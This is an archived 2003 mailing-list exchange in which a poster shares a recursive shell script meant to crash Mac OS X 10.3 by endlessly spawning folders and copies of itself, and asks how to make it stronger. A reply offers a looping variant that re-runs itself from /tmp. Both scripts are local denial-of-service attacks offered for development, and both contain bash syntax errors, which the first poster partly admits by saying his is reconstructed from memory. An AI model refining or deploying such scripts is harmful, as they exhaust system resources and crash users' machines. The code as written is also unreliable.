Vulnerability Development mailing list archives

Re: New mac-10.3 vulnerable to a fork bomb

From: "Daniel" <dan () lockedbox net>
Date: Wed, 12 Nov 2003 23:37:15 +0000

"Ben Greenberg" <benfallout2 () hotmail com> wrote:

I have developed a small but effecteive local DoS fork bomb, which through a

shell script creates folders within folders, then moves itself to the new
folder, worming throughout the hard drive.  eventually the computer is
overloaded with crashes, and the fork service fails.  I was hoping I could
have some help developing this(note: this isnt the exact script, just what i

remember from it.  it was originally more complicated and travelled around
the HD a lot more):
crashing.sh
$i=$i+1
echo crashing
mkdir $i
mv crashing.sh $i/crashing.sh
cd $i
./crashing.sh

anyway to enhance this?
Just off the top off my head also:
just place the script in / or /tmp a static location.

sudocode(/tmp/crash.sh):
#!/bin/bash
for (( $i=1 ; $i<9999 ; $i++ )) ;
do (
mkdir $i
cd $i
/tmp/crash.sh
) done;

Regards,
Daniel.

thanks in advance,

Ben Greenberg

Crave some Miles Davis or Grateful Dead?  Your old favorites are always
playing on MSN Radio Plus. Trial month free!

Please do not send me Word or PowerPoint attachments.